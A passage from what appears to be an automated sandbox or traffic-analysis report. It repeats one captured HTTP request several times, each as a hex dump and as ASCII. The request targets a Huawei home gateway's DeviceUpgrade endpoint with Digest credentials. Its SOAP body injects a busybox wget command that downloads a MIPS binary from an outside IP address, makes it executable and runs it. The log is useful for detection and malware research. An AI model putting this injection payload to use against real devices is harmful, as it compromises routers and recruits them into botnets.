22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data 